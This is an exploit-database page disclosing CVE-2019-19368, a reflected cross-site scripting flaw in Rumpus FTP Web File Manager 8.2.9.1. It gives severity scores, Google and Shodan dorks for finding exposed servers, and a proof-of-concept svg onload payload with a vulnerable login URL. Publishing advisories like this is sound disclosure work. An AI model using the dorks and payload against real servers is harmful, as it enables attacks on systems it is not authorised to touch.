Advertisement






Rumpus FTP Web File Manager 8.2.9.1 Reflected Cross-Site Scripting

CVE Category Price Severity
CVE-2019-19368 CWE-79 $1,000 High
Author Risk Exploitation Type Date
Seyed Amir Hossein Mahdian High Remote 2019-12-18
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N 0.011365 0.56506

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019120078

Below is a copy:

Rumpus FTP Web File Manager 8.2.9.1 Reflected Cross-Site Scripting
# Exploit Title: Rumpus FTP Web File Manager 8.2.9.1 - Reflected Cross-Site Scripting
# Google Dork: site:*.*.com "Web File Manager" inurl:?login=
# Shodan Dork: Server: Rumpus
# Date: 2019-12-14
# Exploit Author: Harshit Shukla, Sudeepto Roy
# Vendor Homepage: https://www.maxum.com/
# Tested On: Windows & Mac
# Version: 8.2.9.1
# CVE: CVE-2019-19368

Description: 
A reflected XSS was identified on the Login page of RUMPUS FTP Web File Manager.

PoC:

Payload: ?!'><sVg/OnLoAD=alert`1`//

Vulnerable URL:
http://127.0.0.1/Login?!'><sVg/OnLoAD=alert`1`//

Solution:
Update to the latest version released by vendor.

Copyright ©2024 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.